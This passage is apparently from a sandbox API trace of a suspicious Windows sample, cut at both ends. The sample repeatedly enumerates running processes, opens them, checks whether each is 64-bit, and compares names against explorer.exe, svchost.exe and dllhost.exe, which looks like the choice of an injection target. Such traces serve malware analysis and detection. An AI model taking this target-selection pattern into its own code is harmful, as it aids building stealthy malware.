(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0179.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0179.971] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.971] CloseHandle (hObject=0xd8) returned 1 [0179.971] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0179.972] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.972] CloseHandle (hObject=0xd8) returned 1 [0179.972] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0179.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0179.972] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.972] CloseHandle (hObject=0xd8) returned 1 [0179.972] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.973] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0179.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0179.973] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.973] CloseHandle (hObject=0xd8) returned 1 [0179.974] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0179.974] CloseHandle (hObject=0xd4) returned 1 [0179.974] Sleep (dwMilliseconds=0x3e8) [0180.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0180.986] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0180.987] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0180.987] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0180.988] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0180.988] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0180.989] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0180.989] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0180.990] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0180.990] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0180.991] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0180.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0180.991] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0180.992] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0180.992] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0180.993] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0180.993] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0180.994] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0180.994] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0180.995] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0180.995] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0180.996] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0180.996] CloseHandle (hObject=0xd8) returned 1 [0180.996] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0180.996] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0180.996] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0180.996] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0180.996] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0180.997] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0180.997] CloseHandle (hObject=0xd8) returned 1 [0180.997] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0180.997] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0180.997] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0180.997] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0180.998] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0180.998] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0180.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0180.998] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0180.999] CloseHandle (hObject=0xd8) returned 1 [0180.999] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0180.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0180.999] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0180.999] CloseHandle (hObject=0xd8) returned 1 [0180.999] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0181.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0181.000] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.000] CloseHandle (hObject=0xd8) returned 1 [0181.000] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0181.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0181.000] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.000] CloseHandle (hObject=0xd8) returned 1 [0181.000] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0181.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0181.001] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.001] CloseHandle (hObject=0xd8) returned 1 [0181.001] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0181.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0181.001] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.001] CloseHandle (hObject=0xd8) returned 1 [0181.002] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0181.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0181.002] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.002] CloseHandle (hObject=0xd8) returned 1 [0181.002] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0181.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0181.003] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.003] CloseHandle (hObject=0xd8) returned 1 [0181.003] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0181.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0181.003] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.003] CloseHandle (hObject=0xd8) returned 1 [0181.003] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0181.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0181.004] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.004] CloseHandle (hObject=0xd8) returned 1 [0181.004] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0181.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0181.004] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.004] CloseHandle (hObject=0xd8) returned 1 [0181.004] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0181.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0181.005] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.005] CloseHandle (hObject=0xd8) returned 1 [0181.005] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0181.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0181.005] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.006] CloseHandle (hObject=0xd8) returned 1 [0181.006] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0181.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0181.006] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.006] CloseHandle (hObject=0xd8) returned 1 [0181.006] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0181.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0181.007] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.007] CloseHandle (hObject=0xd8) returned 1 [0181.007] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0181.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0181.007] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.007] CloseHandle (hObject=0xd8) returned 1 [0181.007] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0181.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0181.008] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.008] CloseHandle (hObject=0xd8) returned 1 [0181.008] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0181.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0181.008] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.008] CloseHandle (hObject=0xd8) returned 1 [0181.008] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0181.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0181.009] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.009] CloseHandle (hObject=0xd8) returned 1 [0181.009] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0181.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0181.009] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.010] CloseHandle (hObject=0xd8) returned 1 [0181.010] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0181.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0181.010] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0181.010] CloseHandle (hObject=0xd8) returned 1 [0181.010] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0181.011] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0181.011] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, 